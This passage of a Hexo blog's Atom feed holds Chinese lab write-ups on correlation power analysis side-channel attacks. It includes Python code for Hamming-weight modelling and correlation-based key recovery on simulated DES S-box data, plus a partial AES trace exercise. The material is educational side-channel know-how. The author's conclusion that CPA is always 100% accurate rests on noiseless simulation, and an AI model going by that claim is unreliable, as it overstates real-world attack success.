class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<summary type="html"><p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for</summary>
</entry>
<entry>
<title>AES CPA攻击</title>
<link href="http://example.com/2021/12/26/%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AE%9E%E9%AA%8C%E5%9B%9B%20AES%20CPA%20%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/26/%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AE%9E%E9%AA%8C%E5%9B%9B%20AES%20CPA%20%E6%94%BB%E5%87%BB/</id>
<published>2021-12-26T14:03:09.000Z</published>
<updated>2022-03-18T06:03:46.020Z</updated>
<content type="html"><![CDATA[<p>参考大佬<a href="https://github.com/newaetech/wiki.newae.com/blob/master/Tutorial_B6_Breaking_AES_%28Manual_CPA_Attack%29.mw">文章</a>,收益匪浅<br>因为这是课内实验,所以我并没有把所有代码都上传,参考的文章里代码很全。</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ol><li>掌握AES算法能量迹构造;</li><li>掌握AES算法CPA攻击基本原理。</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>实验人数</h2><p>每组1人</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h2><p>CPA是利用密码芯片的假设模型,预测其加解密时的功耗大小,然后和实际测量的功耗大小进行相关性分析推测密钥。CPA攻击通常采用汉明重量模型,所谓汉明权重就是一个码字中1码元的总数目,汉明权重越大,芯片运算时的功耗就越大。</p><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>实验内容</h2><ol><li><p>Readfile-student.py:AES 能耗波形文件读入与存储,“Save2Npy”函数输出能量迹trace数据。</p><ul><li>分析程序读入的pts、pcts、pns分别是什么数据,类型是什么,维数是多少</li></ul></li><li><p>CPA-student.py:根据汉明重量模型恢复16个字节密钥。</p><ul><li>补充相关系数的计算代码,并取最大值记为maxcpa</li><li>解释每个生成图像的含义(横纵坐标、波形、尖峰等)</li><li>打印输出恢复的所有正确密钥bestguess</li></ul></li><li><p>分析能量迹对密钥恢复的影响:10、50、100、150、200、240条能量迹能够恢复的正确密钥的字节数和位置分别是什么,并分析其原因。</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="pts、pcts、pns分别是什么数据、类型、维数"><a href="#pts、pcts、pns分别是什么数据、类型、维数" class="headerlink" title="pts、pcts、pns分别是什么数据、类型、维数"></a>pts、pcts、pns分别是什么数据、类型、维数</h3><h4 id="pts"><a href="#pts" class="headerlink" title="pts"></a>pts</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/f1eca09c5a395e01988218b70064c095.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图6.1     pts部分数据 </small> </b></center>数据:明文<p>类型:数组</p><p>维数:二维(250,16)</p><h4 id="pcts"><a href="#pcts" class="headerlink" title="pcts"></a>pcts</h4><p><img src="https://img-blog.csdnimg.cn/89f9a33db14c43a3a3ff210f60e1ea22.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图6.2     pcts部分数据 </small> </b></center>数据:明文,密文<p>类型:数组</p><p>维数:三维(250,2,16)</p><h3 id="pns"><a href="#pns" class="headerlink" title="pns"></a>pns</h3><p><img src="https://img-blog.csdnimg.cn/1f34161969944775956c2e2bc4338788.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图6.3     pns部分数据 </small> </b></center>数据:能量迹纵坐标<p>类型:数组</p><p>维数:二维(250,10000)</p><h3 id="完善相关系数的计算代码"><a href="#完善相关系数的计算代码" class="headerlink" title="完善相关系数的计算代码"></a>完善相关系数的计算代码</h3><p><code>hwlist = np.zeros(numtraces)</code>语句之前的代码是程序自带的,最外层的for循环的目的是遍历密钥的字节位置,第二层的for循环是遍历所有密钥的可能性。本次实验需要使用能量迹的明文和密钥异或运算并执行后续代码,所以还需要设置一层循环,使得对应设置数量的能量迹明文可以和密钥进行运算,求得汉明重量,代码如下。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hwlist = np.zeros(numtraces) <span class="comment">#初始化数组</span></span><br><span class="line"><span class="keyword">for</span> tnum <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, numtraces):</span><br><span class="line"> hwlist[tnum] = HW[intermediate(pt[tnum][bnum], kguess)]</span><br></pre></td></tr></table></figure><p>注意一点pt二维数组(程序另有设置明文数组为pt)的取值,pts明文数组中250表示明文数量,而16是明文的size,所以明文数组长度为16。</p><p>因为是汉明重量模型,按照以往实验的思路,下一步是根据相关系数计算公式<br>$$<br>{r_{i,j} } = \frac{ {\sum\nolimits_{d = 1}^D {\left[ {\left( { {h_{d,i} } - \overline { {h_i} } } \right)\left( { {t_{d,j} } - \overline { {t_j} } } \right)} \right]} } }{ {\sqrt {\sum\nolimits_{d = 1}^D { </p>]]></content>
<summary type="html"><p>参考大佬<a href="https://github.com/newaetech/wiki.newae.com/blob/master/Tutorial_B6_Breaking_AES_%28Manual_CPA_Attack%29.mw">文章</a>,收益匪浅<br></summary>
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>S盒CPA侧信道攻击</title>
<link href="http://example.com/2021/12/24/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%B8%89%20S%E7%9B%92CPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/24/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%B8%89%20S%E7%9B%92CPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/</id>
<published>2021-12-23T16:11:30.000Z</published>
<updated>2022-03-18T06:03:46.019Z</updated>
<content type="html"><![CDATA[<p>—————————————202/12/24 更新—————————————</p><p>如若有图片不能查看,可复制图片链接以浏览。<br>—————————————202/12/23 更新—————————————<br>这个实验和的另一篇文章<a href="https://blog.csdn.net/Reaper_MXBG/article/details/122019954">侧信道实验实验二 S盒DPA侧信道攻击</a>相似处很多,起码在完善Sboxcpa攻击-student.py程序阶段是一样的。因为很近似,所以一些细节我就没有赘述,想看更多细节的可以移步至我的另一篇文章。<br>——————————————-起始内容——————————————-</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ol><li>掌握S盒侧信道攻击的基本原理;</li><li>掌握cpa攻击基本原理和方法。</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>实验人数</h2><p>每组1人</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h2><ol><li><p>测量阶段,选取随机数量明文和设定好的正确密钥进行异或,得到的6bit结果作为S盒的输入,S盒的输出需统计二进制中1的个数,作为汉明重量,所有输出得到一个汉明重量数组。</p></li><li><p>攻击阶段,需要遍历密钥的所有可能,每次遍历都需经历测量阶段,最后得到所有猜测密钥的汉明重量数组,且每个都需和正确密钥得到的汉明重量数组共同计算相关系数数组,公式如下<br>$$<br>corr=\frac{\sum_n^{}{\left(x_i-\overline{x} \right)}\cdot \left( y_i-\overline{y} \right)}{\sqrt{\sum_n^{}{\left( x_i-\overline{x} \right) ^2}}\cdot \sqrt{\sum_n^{}{\left( y_i-\overline{y} \right) ^2}}}<br>$$<br>其中,$\overline{x}=\frac{1}{n}\sum_n^{}{x_i}$,$\overline{y}=\frac{1}{n}\sum_n^{}{y_i}$表示均值。</p></li></ol><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>实验内容</h2><ol><li><p>完成Sboxdpa仿真-student.py程序中的空缺部分</p><ul><li><p>补充n、plaintext、keyTrue</p></li><li><p>补充HWfun函数,返回输入的汉明重量</p></li><li><p>补充主函数,得到输出相应的汉明重量向量</p></li></ul></li><li><p>完成Sboxcpa攻击-student.py程序中的空缺部分:</p><ul><li><p>补充plaintext、power_std</p></li><li><p>补充相关系数Corrfun函数,返回两个向量的相关系数</p></li><li><p>补充主函数,猜测所有可能的密钥,对每个密钥计算相关系数,求出相关系数最大的猜测密钥</p></li></ul></li><li><p>实验测试2组数据</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="完善Sboxdpa仿真-student-py程序"><a href="#完善Sboxdpa仿真-student-py程序" class="headerlink" title="完善Sboxdpa仿真-student.py程序"></a>完善Sboxdpa仿真-student.py程序</h3><h4 id="补充变量"><a href="#补充变量" class="headerlink" title="补充变量"></a>补充变量</h4><p>补充n、plaintext、keyTrue三个变量</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">n = <span class="number">9</span><span class="comment">#第一组明文数组长度</span></span><br><span class="line"><span class="comment">#n = 64 #第二组明文数组长度</span></span><br><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>]<span class="comment">#第一组明文数组</span></span><br><span class="line"><span class="comment">#plainlist = [3, 10, 3, 1, 9, 48, 2, 59, 50, 32, 7, 27, 27, 54, 32, 52, 39, 2, 11, 41, 42, 9, 7, 62, 63, 62, 56, 40, 19, 55, 57, 40, 7, 7, 37, 34, 15, 26, 18, 58, 32, 9, 56, 1, 42, 35, 60, 7, 43, 56, 26, 28, 16, 25, 2, 57, 47, 44, 62, 27, 9, 31, 6, 5] #第二组明文数组</span></span><br><span class="line">keyTrue = <span class="number">49</span><span class="comment">#加密所用密钥</span></span><br></pre></td></tr></table></figure><h4 id="完善HWfun函数"><a href="#完善HWfun函数" class="headerlink" title="完善HWfun函数"></a>完善HWfun函数</h4><p>此函数本质上是计算整数转化为二进制后中1的个数,可以使用快速统计的方法。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">HWfun</span>(<span class="params">num</span>):</span><br><span class="line"> <span class="comment"># 统计输入num的汉明重量并返回</span></span><br><span class="line"> ans = <span class="number">0</span></span><br><span class="line"> <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> num > <span class="number">0</span>:</span><br><span class="line"> num &= (num - <span class="number">1</span>)</span><br><span class="line"> ans += <span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> ans</span><br></pre></td></tr></table></figure><h4 id="完善主函数"><a href="#完善主函数" class="headerlink" title="完善主函数"></a>完善主函数</h4><p>使用表格美化库完善输出。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># 补充:S盒输出对应汉明重量列表</span></span><br><span class="line"> table = pt.PrettyTable()</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, keyTrue)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[i]))</span><br><span class="line"> table.add_column(<span class="string">'序号'</span>,[i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,n+<span class="number">1</span>)])</span><br><span class="line"> table.add_column(<span class="string">'明文-十进制'</span>,[index <span class="keyword">for</span> index <span class="keyword">in</span> plainlist])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-十进制'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> HWout])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-汉明重量'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> hw_std])</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><h4 id="程序运行结果"><a href="#程序运行结果" class="headerlink" title="程序运行结果"></a>程序运行结果</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/6a932427825b14d460c6bf6f10c76497.png#pic_center" alt="3-1.1"></p><center> <b> <small> 图6.1     长度为9的明文数组表格输出 </small> </b></center><center> <b> <small> 图6.2     长度为64的明文数组表格输出 </small> </b></center>### 完善Sboxcpa攻击-student.py程序<h4 id="补充变量-1"><a href="#补充变量-1" class="headerlink" title="补充变量"></a>补充变量</h4><p>使用Sboxdpa仿真-student.py程序得到的结果:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>]<span class="comment">#第一组明文数组</span></span><br><span class="line"><span class="comment">#plainlist = [3, 10, 3, 1, 9, 48, 2, 59, 50, 32, 7, 27, 27, 54, 32, 52, 39, 2, 11, 41, 42, 9, 7, 62, 63, 62, 56, 40, 19, 55, 57, 40, 7, 7, 37, 34, 15, 26, 18, 58, 32, 9, 56, 1, 42, 35, 60, 7, 43, 56, 26, 28, 16, 25, 2, 57, 47, 44, 62, 27, 9, 31, 6, 5] #第二组明文数组</span></span><br><span class="line">power_std = [<span class="number">2</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">2</span>, <span class="number">2</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">2</span>] <span class="comment">#第一组明文数组的汉明重量数组</span></span><br><span class="line"><span class="comment">#power_std = [2, 0, 2, 4, 2, 0, 3, 4, 4, 2, 3, 2, 2, 1, 2, 3, 2, 3, 2, 2, 2, 2, 3, 1, 1, 1, 3, 2, 1, 1, 1, 2, 3, 3, 2, 2, 0, 2, 2, 1, 2, 2, 3, 4, 2, 2, 3, 3, 2, 3, 2, 1, 4, 3, 3, 1, 3, 2, 1, 2, 2, 3, 3, 2] #第二组明文数组的汉明重量数组</span></span><br></pre></td></tr></table></figure><h4 id="完善Corrfun函数"><a href="#完善Corrfun函数" class="headerlink" title="完善Corrfun函数"></a>完善Corrfun函数</h4><p>完全根据公式:<br>$$<br>x corr=\frac{\sum_n^{}{\left(x_i-\overline{x} \right)}\cdot \left( y_i-\overline{y} \right)}{\sqrt{\sum_n^{}{\left( x_i-\overline{x} \right) ^2}}\cdot \sqrt{\sum_n^{}{\left( y_i-\overline{y} \right) ^2}}}<br>$$<br>推导出的代码。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">Corrfun</span>(<span class="params">n, pstd, ptest</span>): <span class="comment"># 计算相关系数</span></span><br><span class="line"> <span class="comment"># 补充相关系数函数,返回两个向量的相关系数值</span></span><br><span class="line"> pstd_mean = mean(pstd)</span><br><span class="line"> ptest_mean = mean(ptest)</span><br><span class="line"> mole = <span class="number">0</span></span><br><span class="line"> denx = <span class="number">0</span></span><br><span class="line"> deny = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> mole += (ptest[i] - ptest_mean) * (pstd[i] - pstd_mean)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> denx += (ptest[i] - ptest_mean)**<span class="number">2</span></span><br><span class="line"> deny += (pstd[i] - pstd_mean)**<span class="number">2</span></span><br><span class="line"> den2 = math.sqrt(denx) * math.sqrt(deny)</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">abs</span>(mole/den2)</span><br></pre></td></tr></table></figure><h4 id="完善主函数-1"><a href="#完善主函数-1" class="headerlink" title="完善主函数"></a>完善主函数</h4><p>遍历0-63共64个密钥(密钥的所有可能性),遍历密钥得到的汉明重量数组和正确密钥得到的汉明重量数组共同带入Corrfun函数,计算相关系数,取所有相关系数中的最大值=1对应的密钥,即为正确密钥。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># 遍历所有可能密钥,计算每个猜测密钥对应的相关系数,求最大系数对应的猜测密钥</span></span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><h4 id="程序运行结果-1"><a href="#程序运行结果-1" class="headerlink" title="程序运行结果"></a>程序运行结果</h4><p>两个长度的数组运行结果都如下<br><img src="https://img-blog.csdnimg.cn/img_convert/3e5fb7bae94b76226c8a31b598b724d0.png#pic_center" alt="3-1.2"></p><center> <b> <small> 图6.3     长度为9&64的明文数组密钥猜测 </small> </b></center><h2 id="思考问题"><a href="#思考问题" class="headerlink" title="思考问题"></a>思考问题</h2><h3 id="除了利用汉明重量模型,还可以用什么模型进行攻击?"><a href="#除了利用汉明重量模型,还可以用什么模型进行攻击?" class="headerlink" title="除了利用汉明重量模型,还可以用什么模型进行攻击?"></a>除了利用汉明重量模型,还可以用什么模型进行攻击?</h3><p>多元模型:汉明重量模型、汉明距离模型</p><p>二元模型:比特模型、零值模型</p><p>除了汉明重量模型,至少还有三种模型可以使用</p><p>实际攻击时采用哪一种仿真模型,需要根据攻击对象(数据)的变化特点、密码芯片对密码算法的实现方式(软件实现、硬件实现)、攻击方法的使用等灵活选择。</p><p>比较熟悉的是汉明距离模型,其通常用于比较两个相同长度的二进制字符串。它还可以用于字符串,通过计算不同字符的数量来比较它们之间的相似程度。在硬件上进行CPA攻击时一般采用汉明距离模型,原因之一就是在功耗曲线基数大时,汉明距离模型比汉明重量模型更有优势。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在实现CPA仿真实验过程中,我有去测试不同明文长度对密钥猜测结果的影响。如上文,我第一次测试长度为9的明文数组结果是正确的。不过不能确定正确率是100%,所以我循序渐进的进行进一步的测试:</p><h3 id="阶段实验"><a href="#阶段实验" class="headerlink" title="阶段实验"></a>阶段实验</h3><p><strong>阶段一:</strong></p><p>采用原明文数组<code>plainlist = [41, 35, 62, 4, 33, 44, 22, 46, 18]</code>,遍历64个密钥,查看结果。</p><p>主函数代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = sboxout(n, plainlist, i) <span class="comment"># S盒输出</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j])) <span class="comment"># 汉明重量</span></span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>运行部分结果如下:</p><p><img src="https://img-blog.csdnimg.cn/3f5f1eada9f04fdfb69da8b3d717d88f.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图8.1     阶段一程序部分输出 </small> </b></center><p>其余结果相同,说明密钥的更改对正确率没影响。</p><p><strong>阶段二:</strong></p><p>采用长度相同(设长度为19)、明文内容不同的100个数组进行测试,正确密钥设为63。</p><p>主函数代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line"> plainlist = <span class="built_in">list</span>(np.random.randint(<span class="number">64</span>, size=<span class="number">19</span>))</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = sboxout(n, plainlist, <span class="number">63</span>)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j]))</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>运行部分结果如下:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/257c17aae79fae9465778e6bd0186bef.png#pic_center" alt="3-1.4"></p><center> <b> <small> 图8.2     阶段二程序部分输出 </small> </b></center>其余结果相同,说明明文内容的更改对正确率没影响。<p><strong>阶段三:</strong></p><p>更改明文长度,从9—64,DES的明文分组上限就是64,至于为什么从9开始,是因为长度过小时可能会出现Corrfun函数内,被除数为0的情况。正确密钥设为45。</p><p>主函数代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>,<span class="number">65</span>):</span><br><span class="line"> plainlist = <span class="built_in">list</span>(np.random.randint(<span class="number">64</span>, size = i))</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = sboxout(n, plainlist, <span class="number">45</span>)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j]))</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>运行部分结果如下:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e5b4924bd69342de77ba05c5e16eb6b1.png#pic_center" alt="3-1.5"></p><center> <b> <small> 图8.3     阶段三程序部分输出 </small> </b></center>其余结果相同,说明明文数组长度的更改对正确率没影响。<h3 id="综合分析"><a href="#综合分析" class="headerlink" title="综合分析"></a>综合分析</h3><p>阶段实验证明CPA仿真攻击的正确率不管在什么情况下都是100%,比DPA效果好多了。原因就在于CPA考虑了方差问题,使得其猜测精度有很明显的提高。</p>]]></content>
<summary type="html"><p>—————————————202&#x2F;12&#x2F;24 更新—————————————</p>
<p>如若有图片不能查看,可复制图片链接以浏览。<br>—————————————202&#x2F;12&#x2F;23 更新—————————————<br>这个实验</summary>
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>S盒DPA侧信道攻击</title>
<link href="http://example.com/2021/12/19/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%BA%8C%20S%E7%9B%92DPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/19/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%BA%8C%20S%E7%9B%92DPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/</id>
<published>2021-12-18T18:55:27.000Z</published>
<updated>2022-03-18T06:03:46.020Z</updated>
